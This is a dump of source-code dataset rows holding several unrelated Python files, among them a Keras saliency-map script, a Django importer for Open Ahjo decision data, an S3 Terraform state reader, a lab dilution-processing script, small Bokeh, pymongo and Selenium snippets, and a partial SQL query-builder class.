blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
45ff041f7e53bb10b214960460aa86afe0a500b6
|
91a916f2300a8ec46c0ce59b5feea0ae4d30d921
|
/hw3/saliency_map.py
|
91e1f188aa077e82b29f548a09a573928106fdbd
|
[] |
no_license
|
andy920262/ML2017
|
9130e18eb5d3be13cac0177cc80e0ed2655ebf63
|
8a63ca87c9a4bad848506fcf73efd09438751a29
|
refs/heads/master
| 2021-03-30T17:37:52.511875
| 2017-06-02T11:47:32
| 2017-06-02T11:47:32
| 82,885,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,483
|
py
|
import matplotlib
matplotlib.use('Agg')
import argparse
from keras.models import load_model
import keras.backend as K
from keras.utils import *
import numpy as np
import matplotlib.pyplot as plt
from data_process import load_data
if __name__ == '__main__':
model_path = ('best_model')
emotion_classifier = load_model(model_path)
private_pixels = load_data('test.csv', 'test')
private_pixels = [x.reshape(1, 48, 48, 1) for x in private_pixels]
input_img = emotion_classifier.input
img_ids = [7122]
for idx in img_ids:
val_proba = emotion_classifier.predict(private_pixels[idx])
pred = val_proba.argmax(axis=-1)
target = K.mean(emotion_classifier.output[:, pred])
grads = K.gradients(target, input_img)[0]
fn = K.function([input_img, K.learning_phase()], [grads])
#print(fn([private_pixels[idx], True]))
heatmap = fn([private_pixels[idx], False])
heatmap = np.array(heatmap).reshape(48, 48)
'''
Implement your heatmap processing here!
hint: Do some normalization or smoothening on grads
'''
thres = np.mean(np.abs(heatmap))
see = private_pixels[idx].reshape(48, 48)
#see[np.where(np.abs(heatmap) <= thres)] = np.mean(see)
plt.figure()
plt.imshow(heatmap, cmap=plt.cm.jet)
plt.colorbar()
plt.tight_layout()
fig = plt.gcf()
plt.draw()
fig.savefig('heatmap{}.png'.format(idx))
plt.figure()
plt.imshow(see,cmap='gray')
plt.colorbar()
plt.tight_layout()
fig = plt.gcf()
plt.draw()
fig.savefig('see{}.png'.format(idx))
|
[
"920262@gmail.com"
] |
920262@gmail.com
|
b11dfdfda95299179c32d624dade4b02b6109105
|
c90970d4535c1fb74fbb841dc5029b5a0faca48e
|
/decisions/importer/open_ahjo.py
|
2309bceb60a26bc8a275694c3fad3b1330710ba2
|
[] |
no_license
|
Metatavu/paatos
|
03a6a3b3a85b367b8cddb24425f7f56025bf5520
|
f597a0e2ac781b916c7a7c2d88afc501bf60c995
|
refs/heads/master
| 2021-01-20T00:40:23.203263
| 2017-09-29T10:48:16
| 2017-09-29T10:48:16
| 89,169,399
| 0
| 0
| null | 2017-05-29T22:02:08
| 2017-04-23T20:11:13
|
Python
|
UTF-8
|
Python
| false
| false
| 9,570
|
py
|
# -*- coding: utf-8 -*-
import json
from django.conf import settings
from decisions.models import (
Action, Attachment, Case, CaseGeometry, Content, DataSource, Event, Function, Organization, Post
)
from .base import Importer
class OpenAhjoImporter(Importer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data_source, created = DataSource.objects.get_or_create(
identifier='open_ahjo',
defaults={'name': 'Open Ahjo'}
)
if created:
self.logger.debug('Created new data source "open_ahjo"')
self.meeting_to_org = None
def _import_functions(self, data):
self.logger.info('Importing functions...')
for function_data in data['categories']:
defaults = dict(
name=function_data['name'],
function_id=function_data['origin_id'],
)
parent_id = function_data['parent']
if parent_id:
try:
defaults['parent'] = Function.objects.get(origin_id=parent_id)
except Function.DoesNotExist:
self.logger('Function parent %s does not exist' % parent_id)
continue
function, created = Function.objects.update_or_create(
origin_id=function_data['id'],
data_source=self.data_source,
defaults=defaults
)
if created:
self.logger.info('Created function %s' % function)
def _import_events(self, data):
self.logger.info('Importing events...')
for meeting_data in data['meetings']:
defaults = dict(
start_date=meeting_data['date'],
end_date=meeting_data['date'],
)
organization_data = self.meeting_to_org.get(meeting_data['id'])
if organization_data:
if organization_data['type'] == 'office_holder':
continue
try:
organization = Organization.objects.get(origin_id=organization_data['origin_id'])
defaults['organization'] = organization
except Organization.DoesNotExist:
self.logger.error('Organization %s does not exist' % organization_data['origin_id'])
continue
event, created = Event.objects.update_or_create(
data_source=self.data_source,
origin_id=meeting_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created event %s' % event)
def _import_case_geometries(self, data):
self.logger.info('Importing case geometries...')
for geometry_data in data['issue_geometries']:
defaults = dict(
name=geometry_data['name'],
type=geometry_data['type'],
geometry=geometry_data['geometry'],
)
case_geometry, created = CaseGeometry.objects.update_or_create(
data_source=self.data_source,
origin_id=geometry_data['id'],
defaults=defaults,
)
if created:
self.logger.info('Created case geometry %s' % case_geometry)
def _import_cases(self, data):
self.logger.info('Importing cases...')
for issue_data in data['issues']:
defaults = dict(
title=issue_data['subject'],
register_id=issue_data['register_id'],
)
try:
defaults['function'] = Function.objects.get(origin_id=issue_data['category'])
except Function.DoesNotExist:
self.logger.error('Function %s does not exist' % issue_data['category'])
continue
case, created = Case.objects.update_or_create(
data_source=self.data_source,
origin_id=issue_data['id'],
defaults=defaults,
)
if created:
self.logger.info('Created case %s' % case)
case.geometries = CaseGeometry.objects.filter(origin_id__in=issue_data['geometries'])
def _import_actions(self, data):
self.logger.info('Importing actions...')
for agenda_item_data in data['agenda_items']:
org = self.meeting_to_org.get(agenda_item_data['meeting'])
if not org:
self.logger.error('Cannot find matching org for meeting %s' % agenda_item_data['meeting'])
continue
defaults = dict(
title=agenda_item_data['subject'],
ordering=agenda_item_data['index'],
resolution=agenda_item_data['resolution'] or '',
)
if agenda_item_data['issue']:
try:
case = Case.objects.get(origin_id=agenda_item_data['issue'])
defaults['case'] = case
except Case.DoesNotExist:
self.logger.error('Case %s does not exist' % agenda_item_data['issue'])
continue
if org['type'] == 'office_holder':
try:
post = Post.objects.get(origin_id=org['origin_id'])
defaults['post'] = post
except Post.DoesNotExist:
self.logger.error('Post %s does not exist' % org['origin_id'])
continue
else:
try:
event = Event.objects.get(origin_id=agenda_item_data['meeting'])
defaults['event'] = event
except Event.DoesNotExist:
self.logger.error('Event %s does not exist' % agenda_item_data['meeting'])
continue
action, created = Action.objects.update_or_create(
data_source=self.data_source,
origin_id=agenda_item_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created action %s' % action)
def _import_contents(self, data):
self.logger.info('Importing contents...')
for content_section_data in data['content_sections']:
defaults = dict(
hypertext=content_section_data['text'],
type=content_section_data['type'],
ordering=content_section_data['index'],
)
action_id = content_section_data.get('agenda_item')
try:
action = Action.objects.get(origin_id=action_id)
defaults['action'] = action
except Action.DoesNotExist:
self.logger.error('Action %s does not exist' % action_id)
continue
content, created = Content.objects.update_or_create(
data_source=self.data_source,
origin_id=content_section_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created content %s' % content)
def _import_attachments(self, data):
self.logger.info('Importing attachments...')
url_base = getattr(settings, 'OPEN_AHJO_ATTACHMENT_URL_BASE', None)
for attachment_data in data['attachments']:
defaults = dict(
name=attachment_data['name'] or '',
url=url_base + attachment_data['url'] if attachment_data['url'] and url_base else '',
number=attachment_data['number'],
public=attachment_data['public'],
confidentiality_reason=attachment_data['confidentiality_reason'] or '',
)
action_id = attachment_data.get('agenda_item')
try:
action = Action.objects.get(origin_id=action_id)
defaults['action'] = action
except Action.DoesNotExist:
self.logger.error('Action %s does not exist' % action_id)
continue
attachment, created = Attachment.objects.update_or_create(
data_source=self.data_source,
origin_id=attachment_data['id'],
defaults=defaults
)
if created:
self.logger.info('Created attachment %s' % attachment)
def import_data(self):
self.logger.info('Importing open ahjo data...')
with open(self.options['filename'], 'r') as data_file:
data = json.load(data_file)
# pre calc meeting to org mapping
org_dict = {o['origin_id']: o for o in data['organizations']}
policymaker_to_org = {p['id']: org_dict[p['origin_id']] for p in data['policymakers']}
self.meeting_to_org = {m['id']: policymaker_to_org[m['policymaker']] for m in data['meetings']}
if self.options['flush']:
self.logger.info('Deleting all objects first...')
Function.objects.all().delete()
Event.objects.all().delete()
CaseGeometry.objects.all().delete()
Action.objects.all().delete()
Content.objects.all().delete()
Attachment.objects.all().delete()
self._import_functions(data)
self._import_events(data)
self._import_case_geometries(data)
self._import_cases(data)
self._import_actions(data)
self._import_contents(data)
self._import_attachments(data)
self.logger.info('Import done!')
|
[
"tuomas.haapala@anders.fi"
] |
tuomas.haapala@anders.fi
|
0e42a6e1f8d9efb5a8261f2ad51f074b8eacea2e
|
38e277526f58eb08ac12257c0297b9d46c421c75
|
/himl/remote_state.py
|
14ea6b5309578c2b471ed2077aa64ad433d98122
|
[
"Apache-2.0"
] |
permissive
|
adobe/himl
|
fdfdbc83caea55d67df8a3bf885b56d80b6bf8f9
|
eb447d157ddd02ef41a07ae0d705e4d3bf6e8d23
|
refs/heads/master
| 2023-09-04T03:35:15.369780
| 2023-08-06T19:35:55
| 2023-08-06T19:35:55
| 202,412,608
| 107
| 31
|
Apache-2.0
| 2023-09-12T12:51:41
| 2019-08-14T19:23:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
# Copyright 2019 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import json
import boto3
class S3TerraformRemoteStateRetriever:
@staticmethod
def get_s3_client(bucket_name, bucket_key, boto_profile):
session = boto3.session.Session(profile_name=boto_profile)
client = session.client('s3')
try:
bucket_object = client.get_object(Bucket=bucket_name, Key=bucket_key)["Body"].read()
return json.loads(bucket_object)
except (client.exceptions.NoSuchKey, client.exceptions.NoSuchBucket):
return []
def get_dynamic_data(self, remote_states):
generated_data = {"outputs": {}}
for state in remote_states:
bucket_object = self.get_s3_client(state["s3_bucket"], state["s3_key"], state["aws_profile"])
if "outputs" in bucket_object:
generated_data["outputs"][state["name"]] = bucket_object["outputs"]
return generated_data
|
[
"costimuraru@gmail.com"
] |
costimuraru@gmail.com
|
613c3df38389bc3ad844a0136c1505cb0f96e312
|
3c61d38436f746729a3b810bbe33926593816223
|
/data_processing/namibia/combo_data_processing_WIP.py
|
be2240f874b3dd81b26b598830198940273b665b
|
[] |
no_license
|
PATH-Global-Health/DIAMETER
|
b9eb01a288eb6af8c6b4dbf059047cfce07e22c3
|
ade4cfd1497351ef2fc1e3f4846c2d0ae00c1abd
|
refs/heads/master
| 2020-05-25T08:54:46.576250
| 2020-04-17T17:09:53
| 2020-04-17T17:09:53
| 187,721,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,074
|
py
|
import os
import argparse
import numpy as np
import pandas as pd
from functools import partial, reduce
# import helper functions
from data_processing_helpers import (run_compare, return_decisions,
fix_concentrations, split_time,
remove_time, read_data)
# import constants
from data_processing_helpers import THRESHOLDS
# function for combining duplicates
def deduplicate(duplicate_df, plex):
# create an empty list to fill with small dfs, which will be combined
deduped_dfs = []
# iterate over analytes
for analyte in THRESHOLDS[plex].keys():
# subset to columns of interest
dup_analyte = duplicate_df[['patient_id', 'well', 'error', 'concentration', analyte]]
pid_dfs = []
# iterate over patient_ids
for pid in duplicate_df['patient_id'].unique():
# subset to specific patient_id
dup_data = dup_analyte.loc[dup_analyte['patient_id'] == pid]
con_dfs = []
# iterate over duplicate concentrations
for concentration in dup_data['concentration'].unique():
# create an empty dataframe to fill
fill_df = pd.DataFrame(columns=['patient_id', 'well', 'error',
'concentration', analyte])
# subset to specific concentration value
dup_con = dup_data.loc[dup_data['concentration'] == concentration]
# get the values for the duplicate concentrations
values = dup_con[analyte]
# also preserve wells and errors for duplicate concentrations
wells = dup_con['well'].tolist()
wells = ''.join(c for c in str(wells) if c not in ["[", "]", "'"])
errors = dup_con['error'].tolist()
non_nan_error = [e for e in errors if e is not np.nan]
if non_nan_error:
errors = non_nan_error
else:
errors = np.nan
try:
# if they're both real numbers, take the average
values = [float(val) for val in values.tolist()]
val = sum(values) / len(values)
except ValueError:
# otherwise...
values = values.tolist()
num_vals = [val for val in values if ('<' not in val) & ('>' not in val)]
# if one is a real number, take that one
if len(num_vals) == 1:
val = num_vals[0]
# if both are non-real, we assume they're the same. maybe sketchy?
else:
val = values[0]
# add values to empty dataframe
fill_df = fill_df.append({'patient_id': pid, 'well': wells, 'error': errors,
'concentration': concentration, analyte: val}, ignore_index=True)
con_dfs.append(fill_df)
con_df = pd.concat(con_dfs)
pid_dfs.append(con_df)
pid_df = pd.concat(pid_dfs)
deduped_dfs.append(pid_df)
deduped = reduce(lambda left, right: pd.merge(left, right, on=['patient_id', 'well', 'error', 'concentration']),
deduped_dfs)
return deduped
# function for determining which dilution value to use
def decider(base_df, plex, base_dil):
# create an empty list to fill with small dfs, which will be combined
analyte_dfs = []
# create an empty dictionary to fill with errors associated with patient IDs
error_pids = {}
# iterate over analytes
for analyte in THRESHOLDS[plex].keys():
patient_dfs = []
# iterate over patient_ids
for pid in base_df['patient_id'].unique():
patient_data = base_df.loc[base_df['patient_id'] == pid]
# get number of dilutions
dilution_values = sorted([val for val in patient_data['concentration'].unique() if val != '1'], key=len)
# set initial best decision to neat (1)
best_decision = '1'
# iterate over dilution values
for max_dilution in dilution_values:
# subset to dilutions
dil_data = patient_data.loc[patient_data['concentration'].isin([best_decision, max_dilution])]
# create partial function for generating decision vectors
partial_compare = partial(run_compare, analyte_val=analyte, dil_val=max_dilution, base=base_dil)
# generate decision vectors
dil_data['decision_vector'] = dil_data.apply(partial_compare, axis=1)
# pull decision matrix for given analyte and concentrations
decisions = return_decisions(best_decision, max_dilution)
decision_matrix = decisions[analyte]
# construct empty dataframe to hold best values
best_df = pd.DataFrame(columns=['patient_id', 'errors', analyte,
'{}_dilution'.format(analyte),
'{}_well'.format(analyte)])
# get decision vectors for each possible decision
vector_low = dil_data.loc[dil_data['concentration'] == best_decision,
'decision_vector'].item()
vector_high = dil_data.loc[dil_data['concentration'] == max_dilution,
'decision_vector'].item()
# get actual decision from decision vectors
decision = decision_matrix[vector_high, vector_low].item()
# set value, well, and error based on decision
if decision in [best_decision, max_dilution]:
val = dil_data.loc[dil_data['concentration'] == decision,
analyte].item()
well = dil_data.loc[dil_data['concentration'] == decision,
'well'].item()
error = dil_data.loc[dil_data['concentration'] == decision,
'error'].item()
elif decision == 'fail':
val = 'fail'
well = 'fail'
error = np.nan
error_pids[pid] = '{} failure'.format(analyte)
else:
raise ValueError("Unexpected decision value: {}".format(decision))
# preserve the unselected dilutions
other_dilutions = [val for val in patient_data['concentration'].unique()]
other_dilutions = [float(val) for val in other_dilutions if val != 'fail']
# preserve the maximum dilution, selected or unselected
max_dilution = max(other_dilutions)
# preserve the selected dilution
df_decision = decision if decision != 'fail' else np.nan
# put all preserved/selected values into the empty dataframe
best_df = best_df.append({'patient_id': pid, 'errors': error, analyte: val,
'{}_dilution'.format(analyte): df_decision,
'{}_well'.format(analyte): well,
'{}_max_dilution'.format(analyte): max_dilution}, ignore_index=True)
best_decision = decision
if decision == 'fail':
break
patient_dfs.append(best_df)
patient_df = pd.concat(patient_dfs)
# set all error columns to object for combination later
patient_df['errors'] = patient_df['errors'].astype('object')
analyte_dfs.append(patient_df)
decided = reduce(lambda left, right: pd.merge(left, right, on='patient_id'), analyte_dfs)
# loop through associated error/patient ID pairs
for pid in error_pids.keys():
# subset to individual error(s) associated to patient ID
error = error_pids[pid]
# subset dataframe to patient ID where error occurs
pid_df = decided.loc[decided['patient_id'] == pid]
# combine all the errors into one big error message
pid_df['errors'] = pid_df['errors'].apply(lambda x: error if np.isnan(x) else x + ' ' + error)
# if there's actually an error...
if len(pid_df) > 0:
# ...replace current dataframe info with the info that contains the error
decided = decided.loc[decided['patient_id'] != pid]
decided = decided.append(pid_df)
return decided
def main(input_dir, input_folder, plex, base_dil):
dfs = []
input_path = '{}/input_data/{}'.format(input_dir, input_folder)
# get all input data, combine into one df
for fname in os.listdir(input_path):
read_data(input_path, fname, plex)
# convert all strings to lowercase
plex_data = plex_data.applymap(lambda x: x.lower() if isinstance(x, str) else x)
# fill empty patient_ids from the preceeding patient_id
plex_data['patient_id'] = plex_data['patient_id'].fillna(method='ffill')
# drop patient_ids that are still null
plex_data = plex_data[~plex_data['patient_id'].isnull()]
dfs.append(plex_data)
samples_data = pd.concat(dfs)
# subset data to just what we want
samples_data = samples_data.loc[~samples_data['type'].isnull()]
if plex == 4:
samples_data = samples_data.loc[~samples_data['type'].str.contains('pixel')]
samples_data = samples_data.loc[samples_data['patient_id'].str.contains('pa-')]
elif plex == 5:
samples_data = samples_data.loc[~samples_data['patient_id'].str.contains('ctrl')]
samples_data = samples_data.loc[~samples_data['type'].str.contains('replicate')]
samples_data = samples_data.loc[~samples_data['type'].isnull()]
samples_data = samples_data.drop('type', axis=1)
# break out concentration from patient string
samples_data['concentration'] = samples_data['patient_id'].apply(lambda x: x.split(' ')[-1])
if plex == 4:
samples_data['patient_id'] = samples_data['patient_id'].apply(lambda x: x.partition(' ')[0])
elif plex == 5:
samples_data['patient_id'] = samples_data['patient_id'].apply(lambda x: '_'.join(x.split(' ')[:3]).replace('/',
'_'))
# remove concentration values we don't want
samples_data = samples_data.loc[(samples_data['concentration'].str.contains('neat|{}'.format(base_dil)))]
samples_data = samples_data.loc[~samples_data['concentration'].str.contains('low volume')]
# remove rows where "well" is null
samples_data = samples_data.loc[~samples_data['well'].isnull()]
# make concentrations more machine/human readable
samples_data['concentration'] = samples_data.apply(fix_concentrations, axis=1)
samples_data = samples_data.sort_values(['patient_id', 'concentration'])
# subset the data to just duplicates
duplicates = samples_data.loc[samples_data.duplicated(subset=['patient_id', 'concentration'], keep=False)]
# run deduplicating function, return deduplicated df
deduped = deduplicate(duplicates)
# replace old duplicated values with new dedeuplicated values
no_duplicates = samples_data.drop_duplicates(subset=['patient_id', 'concentration'], keep=False)
no_duplicates = pd.concat([no_duplicates, deduped])
# run decision function
output_df = decider(no_duplicates)
if plex == 4:
# split time associated with patient_id into its own column
output_df['time_point_days'] = output_df.apply(split_time, axis=1)
output_df['patient_id'] = output_df.apply(remove_time, axis=1)
# sort values
output_df.sort_values(['patient_id', 'time_point_days'], inplace=True)
output_df.set_index(['patient_id', 'time_point_days'], inplace=True)
elif plex == 5:
# sort values and output to a csv
output_df.sort_values('patient_id', inplace=True)
output_df.set_index('patient_id', inplace=True)
output_df.to_csv('{}/output_data/{}_final_dilutions.csv'.format(input_dir, input_folder))
# also output a csv of partially formatted data, for vetting
partial_format = samples_data.copy(deep=True)
if plex == 4:
# split time associated with patient_id into its own column
partial_format['time_point_days'] = partial_format.apply(split_time, axis=1)
partial_format['patient_id'] = partial_format.apply(remove_time, axis=1)
# sort values
partial_format.sort_values(['patient_id', 'time_point_days'], inplace=True)
partial_format.set_index(['patient_id', 'time_point_days'], inplace=True)
elif plex == 5:
# sort values
partial_format.sort_values('patient_id', inplace=True)
partial_format.set_index('patient_id', inplace=True)
partial_format.to_csv('{}/output_data/{}_partially_formatted.csv'.format(input_dir, input_folder))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-id', '--input_dir', type=str,
default='C:/Users/lzoeckler/Desktop/5plex',
help='Input directory')
parser.add_argument('-if', '--input_folder', type=str,
default='menzies_raw',
help='name of folder within input_dir containing data')
parser.add_argument('-p', '--plex', type=int,
default=5,
help="4plex vs 5plex (or any future nplex)")
parser.add_argument('-bd', '--base_dil', type=int,
default=50,
help='Base dilution value beyond neat (1)')
args = parser.parse_args()
main(input_dir=args.input_dir, input_folder=args.input_folder, plex=args.plex, base_dil=args.base_dil)
|
[
"lzoeckler@path.org"
] |
lzoeckler@path.org
|
f8e07bb540bee57fc81311ca0de21bced5b6621b
|
9431bba2d148f8aef9c0a8f3ca16fcf875890757
|
/bokehExer/onlineSample/sliders.py
|
49abe74a8eaf11feee120636e60983bf5dbbdaf7
|
[
"MIT"
] |
permissive
|
terasakisatoshi/pythonCodes
|
fba0b78414b2c85f4a738200354ea583f0516768
|
953210c06e9885a7c885bc01047715a77de08a1a
|
refs/heads/master
| 2023-05-14T12:30:22.201711
| 2023-05-07T13:41:22
| 2023-05-07T13:41:22
| 197,893,702
| 2
| 1
|
MIT
| 2022-11-25T10:59:52
| 2019-07-20T07:09:12
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 420
|
py
|
from bokeh.plotting import figure, output_file, show
# prepare some data
x = [1, 2, 3, 4, 5]
y = [6, 7, 2, 4, 5]
# output to static HTML file
output_file("lines.html")
# create a new plot with a title and axis labels
p = figure(title="simple line example", x_axis_label='x', y_axis_label='y')
# add a line renderer with legend and line thickness
p.line(x, y, legend="Temp.", line_width=2)
# show the results
show(p)
|
[
"terasakisatoshi.math@gmail.com"
] |
terasakisatoshi.math@gmail.com
|
8de038635915ef8036b8a6253f37db06d8a39a01
|
fd0bf99070d83466101869f1a13e3cc408a2a101
|
/python/20130130_ORF_ID_to_Seq_ID.py
|
1a0268524b0c887de61d25e50ca404198c3a04ac
|
[] |
no_license
|
hkkenneth/lihs
|
eabf11173b5f09bdf70ebb6bb58e9bde711e03d8
|
02360939ca9e06e041ce21c99b729a2e12a28411
|
refs/heads/master
| 2021-01-10T10:04:05.807656
| 2013-03-04T15:24:58
| 2013-03-04T15:24:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Author: Kenneth Lui <hkkenneth@gmail.com>
# Last Updated on:
## Usage: python ~/code/python/20130130_ORF_ID_to_Seq_ID.py <INPUT> <OUTPUT>
import sys
if len(sys.argv) < 3:
raise SystemExit, 'use grep "##" ~/code/python/20130130_ORF_ID_to_Seq_ID.py to get usage'
outf = open(sys.argv[2], 'w')
for line in open(sys.argv[1], 'r'):
outf.write("%s\n" % line[:line.rfind("_")])
outf.close()
|
[
"hkkenneth@gmail.com"
] |
hkkenneth@gmail.com
|
a02cf0b3fcfbf26de5c7514aa15fd3ba61c07ab2
|
5cf85939610c9bc568665cb7c178589ef240c72d
|
/Assignment 6/Activity 2.py
|
c4791f99a4e9984f4eef2f89170a17c56af1b990
|
[] |
no_license
|
oboyanivskyy/CIS106-Oleg-Boyanivskyy
|
ffcb8c6cf73f8a343e9cedb53985ff9de056f95b
|
0d315cc0624e85bf3fcbc9c1505e58e8aa787fcd
|
refs/heads/main
| 2023-04-12T20:54:02.491062
| 2021-05-13T16:48:40
| 2021-05-13T16:48:40
| 331,188,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 945
|
py
|
# This updated program will take your age,
# and display your age in months, days, hours,
# and seconds.
def get_age():
print("Enter your age in years.")
age = float(input())
return age
def calc_months(age):
months = age * 12
return months
def calc_days(age):
days = age * 365
return days
def calc_hours(days):
hours = days * 24
return hours
def calc_seconds(hours):
seconds = hours * 60 * 60
return seconds
def display_result(months, days, hours, seconds):
print("You are " + str(months) + " months, ")
print(str(days) + " days, ")
print(str(hours) + " hours, and ")
print(str(seconds) + " seconds old ")
def main():
age = get_age()
months = calc_months(age)
days = calc_days(age)
hours = calc_hours(days)
seconds = calc_seconds(hours)
display_result(months, days, hours, seconds)
main()
|
[
"noreply@github.com"
] |
oboyanivskyy.noreply@github.com
|
6930553da58762d4c112efa76dd6dd1d0b19451b
|
b6fe842749ca288b5e7f048c149b04f035f62b93
|
/mydb/pymongo_insert_col_1.py
|
38b3e68f4f8023abb51adcc22f893011739831c9
|
[] |
no_license
|
zxcvbnm123xy/leon_python
|
c8fa74dd0186402b9edf7466f9a28a6fa586b17c
|
b68f5d5e8240c5a99ec7c155fb85f816ac0d54d1
|
refs/heads/master
| 2020-03-27T03:03:43.610701
| 2018-11-14T09:17:15
| 2018-11-14T09:17:15
| 145,836,887
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
# 加载依赖
import pymongo
# 创建连接
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
# 定位到数据库mongo_python和集合sites
mp = myclient["mongo_python"]
sites = mp["sites"]
#alexa--->网站的全球排名指标
document = {"name": "python", "alexa": "10000", "url": "https://www.python.com"}
ret = sites.insert_one(document)
print(ret)
##打印插入的文档的id值
|
[
"737878501@qq.com"
] |
737878501@qq.com
|
3bc01818033d523d7c3c35a5753db7099d003ea7
|
ddeadd0accfb2f640f2bb7d47a3336b601e1d65b
|
/spider/renniso/article/selenium_test.py
|
818b04dcdc3868ce4b1d735104604acf0d25c8fb
|
[] |
no_license
|
wuxinchaliu/python
|
ff25ed61bb9b0f83bd74243abcd09c1ec154d45e
|
f39751797efc7aeb184fa994f7187b7779fbd301
|
refs/heads/master
| 2021-01-21T04:55:41.347045
| 2016-06-22T06:38:02
| 2016-06-22T06:38:02
| 53,824,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 699
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
import time
import os
import sys
reload(sys)
sys.setdefaultencoding('utf8')
chromedriver = "/usr/local/bin/chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
browser = webdriver.Chrome(chromedriver)
# browser.get("http://www.baidu.com/")
#
# time.sleep(3)
#
# browser.find_element_by_id('kw').send_keys("zhangyanqing")
# browser.find_element_by_id('su').click()
# browser.get("http://www.hnebbs.com/")
url = "http://www.bdsola.com/d/9224.html"
browser.get(url)
print browser.page_source
browser.get("http://www.bdsola.com/d/9234.html")
print '2'
browser.get("http://www.bdsola.com/d/9244.html")
print '3'
browser.close()
|
[
"qi138138lin@163.com"
] |
qi138138lin@163.com
|
165d2c9f59136e1444d55600d106600c891f6da2
|
abcaaaea2c40b175351116599026273ff86d9282
|
/qaserver/libs/query.py
|
eed035c9fdb128a46615e5422870fed35409689f
|
[] |
no_license
|
afterimagex/QAServer
|
01ff21740e5617a18546869d21a8f372bc9d9e27
|
be2603dfc43daf63dc33dc8dd653372c563384f6
|
refs/heads/master
| 2022-03-27T17:28:23.781601
| 2019-12-27T11:06:38
| 2019-12-27T11:06:38
| 229,937,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,068
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# @Time : 2019/12/25 0025 14:58
# @Author : peichao.xu
# @Email : xj563853580@outlook.com
# @File : query.py
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
do_dict = {
"where": "__condition",
"table": "__table_name",
"limit": "__limit",
"order": "__order",
"field": "__field",
"data": "__data",
"group": "__group",
"having": "__having",
"join": "__join",
}
class Query(object):
def __init__(self, table_name=None, db=None):
if not table_name == None:
self.table_name = table_name
if not db == None:
self.db = db
self.__reset()
def __reset(self):
self.__cluster = []
self.__protected = {}
self.__protected["__field"] = "*"
self.__protected["__table_name"] = self.table_name
def __close(self):
self.__reset()
def __tracker(self, name):
if (not name in self.__cluster): self.__cluster.append(name)
def __check(self, name):
return True if (name in self.__cluster) else False
def __do(self, name, value):
value = value.strip() if type(value) == type('string') else value
self.__protected[do_dict[name]] = value
self.__tracker(name)
def __sqlfix(self, sql):
sql = re.sub(r"(?<!%)%(?!%)", "%%", sql)
sql = re.sub(r"(?<!\\)\\(?!\\)", r"\\\\", sql)
return sql
def __valuefix(self, value):
value = re.sub(r"\'", "''", value) if type(value) == type("string") or type(value) == type(
u"unicode") else value
return value
def __sqlbuild(self, sql='', queue=[]):
for statement in queue:
if (self.__check("join") and statement == "join"):
sql = sql + " %s" % self.__protected["__join"]
if (self.__check("where") and statement == "where"):
sql = sql + " WHERE %s" % self.__protected["__condition"]
if (self.__check("order") and statement == "order"):
sql = sql + " ORDER BY %s" % self.__protected["__order"]
if (self.__check("limit") and statement == "limit"):
sql = sql + " LIMIT %s" % self.__protected["__limit"]
if (self.__check("group") and statement == "group"):
sql = sql + " GROUP BY %s" % self.__protected["__group"]
if (self.__check("having") and statement == "having"):
sql = sql + " HAVING %s" % self.__protected["__having"]
if (self.__check("data") and statement == "data:save"):
sets = ""
for data in self.__protected["__data"]:
sets = sets + "%s = '%s', " % (data, self.__valuefix(self.__protected["__data"][data]))
sets = sets.strip().rstrip(",")
sql = sql + " SET %s" % sets
if (self.__check("data") and statement == "data:add"):
sets = ""
values = ""
for data in self.__protected["__data"]:
sets = sets + "%s, " % data
values = values + "'%s', " % self.__valuefix(self.__protected["__data"][data])
